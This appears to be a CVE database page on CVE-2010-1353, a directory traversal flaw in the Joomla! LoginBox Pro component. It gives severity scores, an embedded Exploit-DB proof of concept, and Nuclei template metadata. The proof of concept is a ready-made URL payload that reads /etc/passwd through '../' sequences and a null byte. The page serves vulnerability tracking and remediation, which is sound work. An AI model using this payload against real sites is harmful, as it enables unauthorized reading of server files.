CVE-2010-1353
published 2010-04-12CVE-2010-1353: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)…
PriorityP340medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
19.19%
97.0th percentile
Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component LoginBox - Local File Inclusion
exploitdb·2010-04-05
CVE-2010-1353 Joomla! Component LoginBox - Local File Inclusion
Joomla! Component LoginBox - Local File Inclusion
---
Title : Joomla Component com_loginbox LFI Vulnerability
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
[+] Exploit
http://[site]/[path]/index.php?option=com_loginbox&view=[LFI]
[+] PoC
http://localhost/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
# c0li.m0de.0n
Nuclei
Joomla! Component LoginBox - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1353 [MEDIUM] Joomla! Component LoginBox - Local File Inclusion
Joomla! Component LoginBox - Local File Inclusion
A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: |
Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability
http://packetstormsecurity.org/1004-exploits/joomlaloginbox-lfi.txthttp://secunia.com/advisories/39349http://www.exploit-db.com/exploits/12068http://www.securityfocus.com/bid/39212http://www.vupen.com/english/advisories/2010/0808https://exchange.xforce.ibmcloud.com/vulnerabilities/57533http://packetstormsecurity.org/1004-exploits/joomlaloginbox-lfi.txthttp://secunia.com/advisories/39349http://www.exploit-db.com/exploits/12068http://www.securityfocus.com/bid/39212http://www.vupen.com/english/advisories/2010/0808https://exchange.xforce.ibmcloud.com/vulnerabilities/57533
2010-04-12
Published